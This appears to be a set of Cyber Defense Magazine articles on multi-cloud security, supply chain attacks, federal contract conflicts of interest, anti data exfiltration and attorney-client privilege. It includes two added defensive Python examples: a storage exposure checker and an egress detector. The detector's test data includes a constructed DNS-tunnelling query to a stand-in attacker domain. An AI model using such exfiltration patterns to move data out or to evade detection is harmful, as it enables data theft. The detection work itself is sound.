If security controls are not consolidated in one platform, this leads to the following issues:<br />
• Lack of central visibility: Using different solutions for each cloud platform - and often even multiple solutions per platform, such as cloud security posture managers (CSPM) and cloud workload protection platforms (CWPP) - makes it nearly impossible to get a centralized overview of risks. This means that you will not have a clear handle on your overall cloud security posture and which risks require the most immediate attention.<br />
• High operational costs: Duplicating security policies for different cloud security and compliance tools can quickly become an exhausting drain on your already understaffed cloud security team. Cloud workload protection platforms (CWPPs) also require the installation of an agent on every cloud resource to be monitored. The larger and more diversified your cloud estate, the more time consuming it is to install and maintain agents for every resource.<br />
• Lack of consistency: If you are forced to use several different cloud security tools with each having different configuration options, it is a complex task to ensure the same security and compliance checks are performed across all cloud estates.<br />
• Increased chance of errors: The more manual intervention and duplication security policies require, the more room for human error and wrongly configured security controls.<br />
Best Practices for Multi-cloud Security and Compliance<br />
To minimize the complexity and overhead of securing a multi-cloud environment, follow these five best practices:<br />
1. Insist on multi-cloud support: This one is a no-brainer; make sure your cloud security vendor supports multiple cloud provider platforms.<br />
2. Consolidate cloud security solutions: Leverage full stack cloud security solutions (CWPP and CSPM in one - also referred to as a cloud-native application protection platform, CNAPP), so you can reduce the number of point solutions and replace them with a single tool for all your cloud environments.<br />
3. Go agentless: Eliminate resource-heavy agent deployments that reduce nimbleness and hinder your ability to move applications to other cloud platforms when needed.<br />
4. Get platform specific mitigation steps: Use a cloud security solution with contextual intelligence that prioritizes critical risks and provides platform specific mitigation instructions to make it easier for practitioners to work on multiple cloud platforms.<br />
5. Identify cost saving strategies: Make your CISO love you by using a cloud security tool that allows you to view detailed information on each asset on every cloud platform, including how often it is used. This enables you to advise on further cost saving strategies, such as moving certain applications to other cloud platforms and consolidating or removing redundant services.<br />
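What "the same security and compliance checks across all cloud estates" and "platform specific mitigation steps" look like in code, as an added example that is not Orca Security's code: one control (object storage must block public access), one normalizer per provider that maps the provider's native setting onto that control, one central summary, and a platform-specific mitigation attached to each finding. It goes one step beyond the text by also reporting a resource whose provider has no check as a visibility gap rather than a pass. The inventory records are constructed by hand and only mirror the shape of the providers' public-access settings (S3 Block Public Access, Azure allowBlobPublicAccess, GCS publicAccessPrevention); a real tool would read them through the providers' APIs.<br />

```python
from collections import Counter
from dataclasses import dataclass

# Constructed inventory: hand-written records shaped after each provider's
# native public-access setting, not real API output.
INVENTORY = [
    {"provider": "aws", "type": "s3_bucket", "name": "acme-logs",
     "public_access_block": {"BlockPublicAcls": True, "IgnorePublicAcls": True,
                             "BlockPublicPolicy": True, "RestrictPublicBuckets": True}},
    {"provider": "aws", "type": "s3_bucket", "name": "acme-www-assets",
     "public_access_block": {"BlockPublicAcls": True, "IgnorePublicAcls": False,
                             "BlockPublicPolicy": False, "RestrictPublicBuckets": False}},
    {"provider": "azure", "type": "storage_account", "name": "acmebackups",
     "allow_blob_public_access": False},
    {"provider": "azure", "type": "storage_account", "name": "acmeshare",
     "allow_blob_public_access": True},
    {"provider": "gcp", "type": "gcs_bucket", "name": "acme-exports",
     "public_access_prevention": "enforced"},
    {"provider": "gcp", "type": "gcs_bucket", "name": "acme-legacy",
     "public_access_prevention": "inherited"},
    # A provider no normalizer covers: must surface as a gap, not vanish.
    {"provider": "oracle", "type": "object_storage_bucket", "name": "acme-oracle-bucket"},
]

CONTROL_ID = "STORAGE-01"  # constructed control id: object storage blocks public access


@dataclass(frozen=True)
class Finding:
    provider: str
    resource: str
    control: str
    severity: str
    mitigation: str  # platform-specific step, the article's best practice 4


# One normalizer per provider answers the single question the control asks:
# is public access blocked? Missing values fail closed (treated as not blocked).
def aws_public_blocked(record: dict) -> bool:
    pab = record.get("public_access_block", {})
    return all(pab.get(k) is True for k in
               ("BlockPublicAcls", "IgnorePublicAcls",
                "BlockPublicPolicy", "RestrictPublicBuckets"))


def azure_public_blocked(record: dict) -> bool:
    return record.get("allow_blob_public_access") is False


def gcp_public_blocked(record: dict) -> bool:
    return record.get("public_access_prevention") == "enforced"


NORMALIZERS = {"aws": aws_public_blocked, "azure": azure_public_blocked,
               "gcp": gcp_public_blocked}

MITIGATIONS = {
    "aws": "Enable all four S3 Block Public Access settings on the bucket "
           "(BlockPublicAcls, IgnorePublicAcls, BlockPublicPolicy, RestrictPublicBuckets).",
    "azure": "Set allowBlobPublicAccess to false on the storage account.",
    "gcp": "Set publicAccessPrevention to 'enforced' on the bucket.",
}


def check_public_storage(inventory: list) -> list:
    """Apply the one control to every record, whatever provider it lives in."""
    findings = []
    for record in inventory:
        provider, name = record["provider"], record["name"]
        normalizer = NORMALIZERS.get(provider)
        if normalizer is None:
            # No check for this provider is a visibility gap, reported as such.
            findings.append(Finding(provider, name, CONTROL_ID, "unknown",
                                    "No check implemented for this provider; coverage gap."))
        elif not normalizer(record):
            findings.append(Finding(provider, name, CONTROL_ID, "high", MITIGATIONS[provider]))
    return findings


def posture_summary(inventory: list) -> dict:
    """Central view across providers: what failed and what is not even covered."""
    findings = check_public_storage(inventory)
    return {
        "resources": len(inventory),
        "failing": sorted(f.resource for f in findings if f.severity == "high"),
        "uncovered": sorted(f.resource for f in findings if f.severity == "unknown"),
        "failing_by_provider": dict(Counter(f.provider for f in findings if f.severity == "high")),
    }


if __name__ == "__main__":
    for f in check_public_storage(INVENTORY):
        print(f"[{f.severity:>7}] {f.provider}:{f.resource} {f.control}: {f.mitigation}")
    print(posture_summary(INVENTORY))
```

Each provider is judged by the same question, so a failing bucket in AWS and a failing storage account in Azure show up in one list with the same control id and a fix written for that platform.<br />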
In the age of multi-cloud, security has become more complex and time consuming than ever before. However, by using a holistic cloud security approach that can establish consistent security controls across multiple cloud environments, complexity and duplicated efforts can be greatly reduced. This allows security teams to waste less time on operational tasks and instead focus on securing the cloud environments.<br />
About the Author<br />
Avi Shua is the CEO and co-founder of Orca Security. He invented the patent-pending SideScanning technology upon which Orca Security is built. SideScanning uses novel, out of band, zero impact integration with the cloud virtualization layer to gain full visibility into those risks that matter most: vulnerabilities, malware, misconfigurations, weak and leaked passwords, lateral movement risk and improperly secured customer data. Learn more at Orca.Security.<br />
Avi Shua can be reached online at Twitter and at our company website https://orca.security/<br />
LinkedIn - https://www.linkedin.com/in/avishua/<br />
Twitter (Orca Security) - https://twitter.com/orcasec<br />
Twitter (Avi Shua) - https://twitter.com/shua_avi<br />
How Do You Secure the Modern Supply Chain?<br />
By Brett Raybould, EMEA Solutions Architect, Menlo Security<br />
Supply chains demand better security, and in today’s highly interconnected world this means more security innovation.<br />
The day-to-day operations of a supply chain are often complex, with businesses and individuals demanding that products and services are delivered quickly, efficiently, cost-effectively and, increasingly, sustainably. The role of supply chains has come sharply into focus in the last 18 months during the global pandemic, with major challenges for many industries, including retail, manufacturing, energy and oil & gas.<br />
We have seen cases of empty supermarket shelves across several countries, as well as concerns around energy supplies to keep the lights on. Companies have voiced concerns about supply chain bottlenecks due to a spike in demand for items such as agricultural and petrochemical commodities, paper, chemicals and construction materials, in many cases leading to inflation.<br />
Growing pressures<br />
So the pressure has never been more intense. Add to this the increase in cyber attacks on supply chains in recent years. ENISA, the European Union Agency for Cybersecurity, estimates that there will be four times more supply chain attacks in 2021 than last year [1].<br />
The ransomware attack in May on the Colonial Pipeline has been one of the most high-profile security stories this year. The attack by the hacking group DarkSide shut down a 5,500 mile-long fuel pipeline on the east coast of the US, which carries 45% of the fuel used on the east coast. Since then the US government has offered a bounty of up to $10 million (£7.4m) for information about the group, the largest bounty of its kind.<br />
[1] https://www.enisa.europa.eu/publications/threat-landscape-for-supply-chain-attacks<br />
The IT industry is not immune from supply chain attacks either. SolarWinds suffered an attack last year, with hackers gaining access to the production system for Orion, SolarWinds’ flagship software. In July, Kaseya, a provider of IT management software for MSPs and small to medium-sized businesses, suffered a ransomware attack. As with the SolarWinds attack, the malware spread amongst Kaseya’s clients and affected dozens of businesses.<br />
So while organisations must manage the potential fallout of security breaches to themselves – reputational damage, disruption costs and more – the knock-on effect on customers, partners and the rest of the supply chain is potentially huge.<br />
Digitisation of the supply chain<br />
The ongoing digitisation of the supply chain, often through the cloud, has delivered major efficiency and cost benefits, with shared data and systems in areas such as integrated planning and execution systems, logistics visibility, autonomous logistics, smart procurement and warehousing, spare parts management and analytics.<br />
For a big company like Siemens, for example, working at the bleeding edge of supply chain innovation, the creation of a cloud-based operating system means that it can process data in real time from millions of devices and sensors in plants, systems, machinery and products dispersed throughout production processes and supply chains.<br />
Siemens may be working towards ‘supply chain nirvana’, where processes and decisions happen with minimal human intervention. But the reality for many suppliers, logistics companies, manufacturers and retailers is that business happens in browsers, on email and with shared files. The more we use the Internet to collaborate and communicate, the more we are exposed. Research has shown that web and email attacks are behind 90% [2] of all breaches.<br />
The increased adoption of cloud applications within the supply chain, accelerated by the challenges of COVID, has made the browser the most important productivity tool on any endpoint. But at the same time, the majority of cyber attacks start with the browser, and it doesn’t take much for a determined attacker to understand your key suppliers and partners and use this to target users with phishing emails and infected attachments, websites and downloadable documents.<br />
[2] Sources: Google, Verisign<br />
The case for isolation<br />
Supply chains are evolving to be as much about the efficient exchange of information as they are about the flow of goods and services. But where there is information sharing, cybersecurity professionals are rightly uneasy. Menlo Labs has seen a steady rise in ‘credential phishing’ attacks, in which attackers create fake login pages or forms to steal users’ credentials for commonly used services, including email and document exchanges with supply chain partners.<br />
Attackers can use credential phishing to breach an organisation’s smaller supply chain partner (whose controls may be easier to bypass) and then use an exchange of information containing malware as an easy way to move laterally and infect the larger enterprise. If this company is consciously or unconsciously allowing smaller partners to store sensitive data, attackers don’t even need to move laterally – the data is already freely available on the smaller partner’s network.<br />
We can all fall victim to a seemingly normal website or email. So now businesses are exploring options that isolate employees’ devices. Rather than detecting threats and blocking employees from accessing potentially malicious web content, this approach simply isolates all endpoints from browser-based traffic.<br />
Take the example of a large, global manufacturer with many employees engaged in digital research and communications: it was trying to manage large volumes of phishing attacks and web malware. This meant infected devices required costly, time-consuming reimaging. While anti-phishing training for employees had some impact in reducing attacks, many employees continued to click on infected links, leading to credential theft and malware infection.<br />
Isolation has changed this, as all the unknown executable code from the Internet that employees previously came into contact with – including any websites visited – is now executed in a remote cloud container. Whether browsing online, reading emails or downloading documents, it is impossible for malware to infect users’ devices or the network. Plus, there is no impact on user accessibility or performance.<br />
To reduce risk but maintain agility, fast-moving organisations in the manufacturing, logistics, retail and other industries are deploying solutions to prevent malicious code from ever reaching the network perimeter – mobilising isolation-powered cloud security to shut the door on malware from within any supply chain communications.<br />
Isolation, however, will not protect an entire supply chain system from the growing number and range of attacks. Cybersecurity for these critical networks needs security and IT specialists to have conversations with a wider range of functions, such as sourcing, vendor and partner management and logistics, in a coordinated effort to reduce risks.<br />
About the Author<br />
Brett Raybould, EMEA Solutions Architect, Menlo Security<br />
Brett Raybould is EMEA Solutions Architect at Menlo Security, a leader in cloud security. In this role, he is responsible for technical sales, product demonstrations, installations, solution proposals and evaluations. Brett joined Menlo Security in 2016 and discovered how isolation technology provides a new approach to solving the problems that detection-based systems continue to struggle with.<br />
Passionate about security, Brett has worked for over 15 years for some of the leading vendors specialising in the detection of inbound threats across web and email, and data loss prevention (DLP), including FireEye and Websense. He has represented Menlo Security as a speaker at industry events, including e-Crime & Cybersecurity Congress and Cloud Security Expo.<br />
Don’t Take Yourself Out of The Game: Mitigating the Risk Of An Organizational Conflict Of Interest In Federal Contracts<br />
By Michelle Litteken, Of Counsel, Morris, Manning & Martin LLP<br />
Nearly every solicitation for a federal government contract contains a provision pertaining to organizational conflicts of interest (OCI). These OCI provisions are important as the existence of an OCI can result in the loss of a contract. The risk of an OCI is particularly acute in the information technology (IT) and cybersecurity sectors because of the nature of the work performed, as well as the access to sensitive information that providing such services may facilitate. Yet, many government contractors do not understand OCIs, and as a result, are unable to identify potential OCIs or proactively implement measures to avoid or mitigate an OCI. It is not uncommon for a contractor to be unaware of a potential or actual OCI until after a contracting officer raises the topic or a competitor files a bid protest. At that stage, it may be difficult – if not impossible – to mitigate or avoid the OCI. For this reason, gaining a better understanding of OCIs can provide a contractor with a competitive advantage.<br />
Understanding OCIs<br />
Contracting officers are required to determine whether a potential or actual OCI will arise as early in an acquisition as possible.[3] If the award to a particular offeror would result in an actual or potential OCI, and the OCI cannot be mitigated or avoided, the offeror will likely be deemed ineligible for the award.<br />
There are three types of OCIs:<br />
• Unequal Access to Information: This type of OCI arises in situations in which a contractor has access to non-public information as part of its performance of one government contract and that information may provide the firm with a competitive advantage in a later competition for another government contract.<br />
• Biased Ground Rules: This type of OCI issue arises in situations when a contractor, as part of its performance of a government contract, has, in some sense, set the ground rules for government procurement, for example, by preparing the statement of work or the specifications. The concern with a biased ground rules OCI is that the contractor may have skewed the procurement in the contractor’s favor – even if unintentionally.<br />
• Impaired Objectivity: This type of OCI issue arises in cases when a contractor’s work under one government contract could entail it evaluating itself, an affiliate, or a competitor, either through an assessment of performance under another contract or an evaluation of proposals as part of another contract. This type of OCI occurs when the contractor may not be able to provide the government with impartial advice or assessments.<br />
It is important to recognize that a single contract may give rise to more than one type of OCI. For example, if a contractor was performing a contract that involved independent verification and validation (IV&V) tasks related to IT systems used by an agency, the contractor could have both an unequal access to information OCI and an impaired objectivity OCI. The unequal access to information OCI would result from the contractor having access to nonpublic information about the IT systems provided to the agency by other contractors. And an impaired objectivity OCI could arise because the IV&V tasks would likely require the contractor to assess the services or products provided by other contractors.<br />
OCI Risks for Cybersecurity and IT Services
The type of tasks common to contracts involving cybersecurity or IT services can increase the risk of an OCI. Providing these types of services to the government often puts a contractor in a position where it has access to nonpublic government or competitor information (an unequal access to information OCI) or requires the contractor to assess the services or products provided by competitors or affiliates (an impaired objectivity OCI).
3 48 C.F.R. 9.504(a)(1).
Cyber Defense eMagazine – December 2021 Edition 88
Copyright © 2021, Cyber Defense Magazine. All rights reserved worldwide.
The U.S. Government Accountability Office's (GAO) bid protest decision in Steel Point Solutions, LLC,4 provides an instructive example of how an impaired objectivity OCI can come about while providing IT services to the government. The protest involved a solicitation to design, build, and operate a corporate automation implementation center for the National Geospatial-Intelligence Agency (NGA). The scope of work included recommending, designing, deploying, monitoring, and maintaining robotic process automation solutions for the NGA. Deloitte Consulting, LLP (Deloitte) was selected for the award, and a protester challenged the award, arguing that Deloitte had task orders with the NGA that created an impaired objectivity OCI.
Under one of the task orders, Deloitte supported the NGA in determining what products to purchase to maintain NGA's IT portfolio. At the same time, under the protested contract, Deloitte would be deploying and maintaining IT systems if the contract award was upheld. Stated differently, under the task order, Deloitte would be making recommendations to the NGA about what products to purchase to maintain the IT systems under the protested contract, which could include Deloitte's own offerings. GAO characterized the situation as a "textbook example" of an impaired objectivity OCI because Deloitte would be "in a position to make judgments or recommendations that would have the effect of directly influencing its own well-being."
GAO also found that a separate Deloitte task order presented an impaired objectivity OCI. Under the second task order, Deloitte facilitated the review and approval of all NGA information systems. In its proposal for the protested contract, Deloitte recognized there was a potential OCI because its work under the task order could require Deloitte to determine whether to approve systems to be used under other contracts, and Deloitte attempted to address the potential OCI using the template mitigation plan that was provided with the solicitation. GAO found the mitigation plan vague and nonspecific, and the separate mitigation plan Deloitte had submitted for the task order was ultimately of no help because that plan depended on Deloitte not pursuing work that would give rise to an OCI, a commitment that plainly failed once Deloitte decided to compete for the protested contract. GAO sustained the protest and recommended that the NGA reconsider its OCI analysis.
One can easily imagine how the task orders discussed above could give rise to an unequal access to information OCI. For example, advising an agency about the types of IT services and products to procure could provide a contractor with information about the agency's budget forecasts, future requirements, and acquisition plans, all competitively useful nonpublic information. Likewise, facilitating the review and approval of an agency's information systems would provide a contractor with information about competitors' systems and the agency's requirements, also competitively useful nonpublic information. At this point, the significance of OCIs for contractors working in the IT and cybersecurity sectors should be clear.
OCIs Caused by Subcontractors
Contractors should also be mindful of the fact that a subcontractor can introduce an OCI into a procurement. If a subcontractor would have an OCI as a prime contractor for a given opportunity, performing as a subcontractor does not remove the OCI.
4 Steel Point Solutions, LLC, B-419709, B-419709.2, July 7, 2021, 2021 CPD 254.
GAO's decision in L-3 Services, Inc.,3 demonstrates how a subcontractor's existing contractual relationships can cause an OCI for a prime contractor. The bid protest involved a contract to consolidate operations and maintenance requirements for networks at seven operating bases. The protester argued that the awardee had an unequal access to information OCI and a biased ground rules OCI because another company affiliated with the awardee's subcontractor had provided technical guidance for the protested requirement and had access to unredacted copies of contracts, core communications requirements, internal agency information about upgrading communications and IT infrastructure, and proprietary information of other companies.
After the protest was filed, the agency argued there was no unequal access to information OCI because (i) the information was not competitively useful and (ii) the information used to develop the solicitation was disclosed to all offerors. GAO rejected these arguments, finding that neither the contractor nor the agency had tracked what information the affiliated company had access to over the course of performance. GAO surmised that the affiliated company likely had access to nonpublic information the agency was not aware of and that was never disclosed to offerors. Notably, in overturning the award, GAO did not base its decision on whether or not the prime awardee actually had access to the information. Instead, GAO held that access by an affiliate of a subcontractor was sufficient to create an OCI.
GAO also held there was a biased ground rules OCI because, although the subcontractor's affiliate did not draft the specifications, the affiliated company participated in the business/mission case development, and its research became part of the source information used to develop the requirement. GAO sustained the protest, recommended that the awardee's subcontractor be excluded from the competition, and recommended that the procuring agency conduct a new OCI investigation and determination.
Mitigating an OCI
As the cases discussed above illustrate, an OCI can be devastating for a company. However, in many situations, the adverse effects of an OCI can be avoided by proactively implementing an OCI mitigation plan. To be effective, a mitigation plan must be tailored to a specific contract opportunity and the circumstances that give rise to the actual or potential OCI(s). Nonetheless, there are some general principles that may guide the development of a plan:
• An unequal access to information OCI is the easiest type of OCI to mitigate. The objective is to limit access to and dissemination of competitively useful nonpublic information. Mitigation techniques include nondisclosure agreements, firewalls (in this context, information barriers between groups of personnel, not network devices), document controls, and restricting personnel assignments.
• An impaired objectivity OCI is more difficult to mitigate. A firewall or other type of information control will not mitigate an impaired objectivity OCI, and neither will using a separate division to perform the problematic tasks. Instead, an impaired objectivity OCI may be mitigated by using a firewalled subcontractor who reports directly to the government or by using objective assessment criteria for the problematic tasks. Recusal may also be an option. All of these techniques require government cooperation.
• A biased ground rules OCI is also difficult to mitigate. Firewalls, or even using a different division, are insufficient because anyone who works for the contractor will be presumed to act in the contractor's interest. For this reason, recusal or using a firewalled subcontractor are often seen as the only viable strategies.
For all of these mitigation strategies, proactive OCI identification, prior to bidding on the contract, is critical.
3 L-3 Services, Inc., B-400134.11, B-400134.12, Sept. 3, 2009, 2009 CPD 171.
Conclusion
In a world where the government is acquiring more and more IT and cybersecurity products and services, the potential for overlapping requirements, and therefore for OCIs, increases. Contractors operating in these sectors should be attuned to OCIs and the associated risks. In many cases, if a potential OCI is identified early and handled proactively, its impact on future opportunities can be mitigated or negated. To take those proactive actions, the contractor must understand what an OCI is and how an OCI arises. Armed with this information, a contractor may retain hard-won contracts and avoid exclusion because of OCIs.
About the Author
Michelle Litteken is Of Counsel with the Government Contracts Practice Group in Morris, Manning & Martin LLP's Washington, D.C. office. She helps clients understand and successfully navigate all aspects of government contracts by using creative and practical measures. Ms. Litteken regularly advises her clients at every stage of the process, from understanding the requirements and securing the contract, to defending the bid, as well as assisting with potential issues that may arise during contract performance. She can be reached at mlitteken@mmmlaw.com.
Is Anti Data Exfiltration the Holy Grail of Cyberattack Prevention?
By Dr. Darren Williams, Founder & CEO, BlackFog, Inc.
Despite organizations continuing to invest heavily in the latest cybersecurity solutions, and the realization that AV solutions are not able to defend against most new attack vectors, cyberattacks are at an all-time high. This year has witnessed an unparalleled number of attacks that have devastated infrastructure, governments, and businesses alike, and cybercrime is expected to cost more than 6 trillion dollars globally. With access to so many cybersecurity tools, why are we losing the battle? Why are existing solutions so ineffective? Is Anti Data Exfiltration the Holy Grail of cyberattack prevention?
To understand the problem, it is important to look at the lifecycle of an attack in order to devise countermeasures against it. Since the 1980s the general approach to detecting attacks has not changed. The theory is simple: once an attack has occurred, identify the code that caused the damage and create a fingerprint (a signature, in cybersecurity parlance). Store the signatures in a database, distribute it to all customers, and check each file against it on execution. If it matches, prevent execution and remove the file. This technique worked well for many years, until threat actors developed fileless and polymorphic attacks (code that never lands on disk as a file, or that changes with every copy, so there is no stable signature to match).
Traditionally, the focus of cyberattacks was disruption and bragging rights; very few focused on making money directly from the endeavor. Until cryptocurrency arrived (Bitcoin launched in 2009) it was difficult for cybercriminals to monetize an attack directly. Often it was state-sponsored attacks that fueled growth, and the economics centered on the loss of business or the negative impact on stock prices from the attack, or on pump-and-dump schemes that influenced the price of stocks in the short term.
Cybercrime changed forever in 2013 when the first widely successful crypto-ransomware appeared. Dubbed CryptoLocker, it arrived as an email attachment, encrypted most files on the target device, and offered to decrypt them only when a ransom was paid. Because the ransom was collected in Bitcoin, payments were pseudonymous and far harder to trace to a person than a bank transfer. This was the beginning of a new era and one that continues to reach new highs every year.
In 2021 we have seen devastating attacks across the globe. The top cyberattacks of 2021, such as those on CNA Financial, Colonial Pipeline and JBS Foods, helped raise awareness and capture the attention of governments and citizens alike. Ransomware attacks are now so prevalent that TV shows regularly build plotlines around them; recent examples include "The Good Doctor" and "9-1-1".
Ransomware has also evolved from those early days. While it initially focused on encryption, it has now moved to double, triple and even quadruple extortion. The focus of these newer attacks is less on encryption and more on other mechanisms of making money. The typical strategies these gangs employ include:
1. Direct encryption: Encrypt files on the device and display a paywall that requires a cryptocurrency payment before decryption takes place.
2. Data extortion: Instead of, or in addition to, encrypting files, cybercriminals exfiltrate data from the device in the background, sending it to command and control (C2) servers, often in foreign countries such as Russia and China. A small sample of the files is published on the Dark Web as proof, and the full set is offered for sale to third parties.
3. Attack notification: Prior to launching an attack, ransomware gangs sell information about the pending attack to third parties, who can use the advance notice to short the victim's stock or profit by other means.
4. Cryptojacking: In addition to stealing data, newer ransomware variants can mine cryptocurrency, making money by hijacking the CPU of the host device and leaving the victim to pay the energy costs of mining. Because cryptojacking shows up mainly as outbound traffic to mining pools rather than as a recognizable malicious file, it is often overlooked by traditional security solutions.
These new attacks are highly coordinated by well-resourced gangs that have business models and even channel operations like a traditional business. Under the ransomware-as-a-service model, anyone who wants to launch an attack can contact the gang directly to license its software, in return for a percentage of any ransom paid.
The one common factor in these new approaches is that they all involve some form of data exfiltration: for any of these attacks to succeed, data must leave the device. In fact, of the 244 reported ransomware attacks this year, 83.3% threatened to exfiltrate data.
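Because every variant above depends on data leaving the device, the defensive leverage is at the egress point. The following is an added example of the two simplest checks an anti data exfiltration control applies to outbound traffic: per-host volume against a learned baseline, and DNS-label entropy for tunnelling. It is illustrative code written for this article, not BlackFog's product; the flow records, DNS queries, hostnames, threshold values and the documentation-range IP addresses are all constructed.

```python
"""Egress anomaly checks over constructed flow and DNS logs (added example, not product code)."""
import math
from collections import defaultdict

# Constructed flow records: (host, dst_ip, dst_port, bytes_out). Addresses are from the
# RFC 5737 documentation ranges, so none of them is a real destination.
BASELINE_FLOWS = [                       # "last week": what normal looks like per host
    ("ws-17", "192.0.2.10", 443, 180_000),
    ("ws-17", "192.0.2.10", 443, 210_000),
    ("ws-17", "198.51.100.20", 443, 95_000),
    ("ws-22", "192.0.2.10", 443, 60_000),
    ("ws-22", "198.51.100.20", 443, 70_000),
]
TODAY_FLOWS = [
    ("ws-17", "192.0.2.10", 443, 190_000),        # normal
    ("ws-17", "203.0.113.7", 443, 3_400_000_000),  # 3.4 GB to a never-seen host
    ("ws-22", "198.51.100.20", 443, 65_000),       # normal
]
# Constructed DNS queries: (host, qname). The long label stands in for encoded data.
DNS_QUERIES = [
    ("ws-22", "mail.example.com"),
    ("ws-22", "a9f3k2qz8x1vb7n4c6m0.t.attacker-dns.example"),
]


def build_baseline(flows):
    """Per host: the set of destinations ever used and the total bytes sent."""
    dests, total = defaultdict(set), defaultdict(int)
    for host, dst, _port, nbytes in flows:
        dests[host].add(dst)
        total[host] += nbytes
    return dests, total


def flag_egress(flows, baseline, ratio=10.0):
    """Alert when a flow goes to a destination the host has never used AND moves more than
    `ratio` times the host's entire baseline volume. Either signal alone is too noisy to act
    on; together they describe a bulk upload to somewhere new. A host absent from the
    baseline has an empty destination set and zero volume, so its first flow alerts."""
    dests, total = baseline
    alerts = []
    for host, dst, port, nbytes in flows:
        if dst not in dests[host] and nbytes > ratio * total[host]:
            alerts.append((host, dst, port, nbytes))
    return alerts


def shannon_entropy(s: str) -> float:
    """Bits per character; random-looking encodings score high, words score low."""
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def flag_dns_tunnel(queries, min_label_len=16, min_entropy=3.5):
    """Long, high-entropy leftmost labels are the fingerprint of data packed into DNS names."""
    alerts = []
    for host, qname in queries:
        label = qname.split(".")[0]
        if len(label) >= min_label_len and shannon_entropy(label) >= min_entropy:
            alerts.append((host, qname))
    return alerts


if __name__ == "__main__":
    base = build_baseline(BASELINE_FLOWS)
    for alert in flag_egress(TODAY_FLOWS, base):
        print("EGRESS", alert)
    for alert in flag_dns_tunnel(DNS_QUERIES):
        print("DNS   ", alert)
```

In production the baseline is learned per host over a rolling window and the thresholds are tuned per environment; the structure of the checks (new destination plus volume, and entropy plus label length) is the part that carries over.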
New data from Osterman Research reveals that despite significant investment in tools like data loss prevention, organizations still struggle with cyberattacks and the prevention of data exfiltration. A majority of respondents reported weak confidence in their current solution's ability to prevent data exfiltration (62%) or to prevent ransomware (55%). This is clear evidence that most organizations are missing an important piece in their approach to cybersecurity.
Existing technology is ineffective at protecting what has arguably become a business's most valuable asset, the data itself. More needs to be done to ensure organizations can lock down their critical information in the face of mounting attacks. And it is not just external adversaries that pose a risk. A majority of organizations (59%) lack confidence in their current solution's ability to prevent insiders from exfiltrating data, and 41% have experienced an employee's mistake resulting in data exfiltration. The human element cannot be overlooked, especially in the wake of the pandemic, where the blurred lines between corporate and personal lives leave critical assets more exposed than ever before.
The consequences of having inadequate tools can be catastrophic, with companies' sensitive data being compromised and their reputations often damaged irreparably. For companies hit by a ransomware attack, consumer trust is often severely affected: 23% of consumers report they would stop doing business with a company that paid a ransom, and 48% say it is a great concern and they would seriously consider stopping business with the company entirely. It is therefore critical to have both a data protection strategy and the tools in place for anti data exfiltration, the new holy grail of cyberattack prevention.
About the Author
Dr. Williams is a serial entrepreneur and founder of several tech startups, most recently BlackFog, which has pioneered Anti Data Exfiltration (ADX) in the fight against cybercrime. Dr. Williams holds a Ph.D. and Bachelor of Science with Honors from the University of Melbourne.
Attorney-Client Privilege Communication Best Practices
By Nicole Allen, Marketing Executive, Salt Communications.
On a daily basis, corporate counsel and their clients communicate confidentially. Assumptions regarding what is and will remain attorney-client privileged are built into these interactions. Attorney-client privilege, one of the oldest legal concepts in Anglo-American jurisprudence, is facing a paradigm shift with today's rapid work culture advancement. While technological innovation has allowed for faster and more effective communication and production, it has also increased the risk of losing attorney-client privilege. Given the speed and complexity of today's corporate environment, confidentiality, which is a core element of this privilege, is positioned to become an accidental and unrecognised casualty.
As a result of this shift, in-house legal counsel must become more knowledgeable about an already complex legal system while navigating a range of cloud collaboration programmes and other types of electronic communication. In-house counsel should review the following recommended practices to preserve privilege and protect confidentiality in a modern business setting.
Attorney-Client Privilege & In-House Counsel
The attorney-client privilege protects oral and written communications to, from, or with an attorney for the purpose of seeking or receiving legal advice. It is one of the more sophisticated but well-respected areas of legal practice.
Certain communications are protected from disclosure to third parties under the attorney-client privilege. To qualify, a communication must be confidential, between an attorney and a client, and made for the purpose of seeking or providing legal advice. If any of these three criteria is not met, the communication is not privileged. The overarching goal of the privilege is to encourage open communication and information sharing so that clients can seek legal counsel without fear of unintended exposure.
Best practices for legal professionals
Attorney-client privilege is still one of the more difficult and subtle aspects of legal practice. The corporate entity, with employees, business units, and governing boards, adds to the intricacy of this privilege for corporate counsel. The fact that in-house counsel serves as both a trusted legal expert and a business advisor further complicates the matter.
Although there is minimal case law dealing specifically with privilege and communication platforms or tools, the established privilege rules apply. Courts use the modified subject matter test to evaluate whether a corporate communication is protected by the attorney-client privilege. Under that test, a communication is protected when a corporate employee communicates with corporate counsel to obtain legal advice, the subject matter falls within the scope of the employee's duties, the employee made the communication at the direction of a superior, and the communication is shared only with those who need to know its contents.
Take time to educate yourself
Comment 8 to ABA Model Rule 1.1, which states that a lawyer "should keep abreast of changes in the law and its practice, including the benefits and risks associated with relevant technology," has been adopted by the American Bar Association and by many states. As a result, lawyers are expected to be aware of the risks and benefits of technology and to make judicious use of it.
BYOD Policies
BYOD (bring your own device) policies can be written to provide some protection against certain dangers. An employee's use of a BYOD smartphone or tablet blurs the barrier between personal and professional life. Like a thumb drive, a BYOD device can readily hold trade secrets, on the device itself or through a cloud storage service, but unlike a company-issued thumb drive it is rarely under the company's control. The employee's expectation of privacy is at the heart of the legal issue. The most forward-thinking businesses will create a detailed, customised BYOD strategy that works in tandem with existing security measures; in more restrictive regimes, employees who use a BYOD smartphone or tablet alongside business computers will have to sign away their expectation of privacy on those devices.
Bring-your-own-device rules appear to reduce company expenditure on the surface, but they come with a slew of hidden costs, including issues with attorney-client privilege. Companies with a BYOD policy have less control over the devices and are constrained in their capacity to implement proper security. Furthermore, businesses have less control over information access and over how information is sent and stored on personal devices, which can be problematic for confidentiality and attorney-client privilege.
Secure your communications
Counsel should make certain that communications are sent only to the appropriate people. If irrelevant individuals are included in confidential communications, it may be more difficult to demonstrate that privilege applies. This applies to all kinds of communication, including newer messaging tools such as Slack and agile project management platforms such as Jira and Trello. Despite the ease and efficiencies offered by many current platforms, the legal system is straining to keep up with such rapid technological advancement.
Salt is a secure communications solution designed to protect and secure information when communicating on mobile and desktop devices, providing a closed network for both law firms and their clients. Mobile communications present major privacy challenges for the legal industry. Client-attorney privileged discussions, confidential merger/acquisition details, and integral legal strategies are just a few examples of mobile communications that have been intercepted and used to the perpetrator's advantage.
